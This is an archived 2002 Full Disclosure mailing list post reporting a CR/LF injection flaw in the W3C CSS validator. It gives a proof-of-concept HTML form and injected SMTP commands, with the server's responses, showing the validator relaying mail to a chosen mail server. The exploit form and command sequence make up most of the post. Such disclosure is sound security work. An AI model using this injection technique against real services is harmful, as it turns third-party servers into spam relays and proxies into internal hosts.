Full Disclosure mailing list archives
W3C CSS Validator -- Proxying Attack
From: mattmurphy () kc rr com (Matthew Murphy)
Date: Sat, 14 Sep 2002 15:59:51 -0500
Another vulnerability at the W3C, this time the CSS validator. A Cr/Lf injection can be performed by creating a custom form: <FORM METHOD="GET" ACTION="http://jigsaw.w3.org/css-validator/validator"> <INPUT TYPE="hidden" NAME="warning" VALUE="1"> <INPUT TYPE="hidden" NAME="profile" VALUE="css2"> Commands: <TEXTAREA STYLE="width:300px;height:300px" NAME="uri" ONDBLCLICK="document.forms(0).submit()"></TEXTAREA> </FORM> And filling it in with something like: [Begin Form] http://mailserver:25/ HELO 127.0.0.1 MAIL FROM:me () here com RCPT TO:you () somewhere com DATA This is a simple message demonstrating the W3 relaying hole . QUIT [End Form] This results in: GET / 502 Unknown Command HELO 127.0.0.1 250 Welcome [138.96.249.65], pleased to meet you MAIL FROM:me () here com 250 Sender "me () here com" OK... RCPT TO:you () somewhere com 250 Recipient "you () somewhere com" OK... DATA 354 Enter mail, end with "." on a line by itself This is a simple message demonstrating the W3 relaying hole . 250 Message accepted for delivery. QUIT 221 Closing Session If you relay this properly, the CSS validator will whine about the connection being terminated by the peer (this is done immediately after the SMTP command "QUIT" being sent. There is a 502 error in the logs from "GET /", but that is really un-avoidable. "The reason the mainstream is thought of as a stream is because it is so shallow." - Author Unknown
Current thread:
- W3C CSS Validator -- Proxying Attack Matthew Murphy (Sep 14)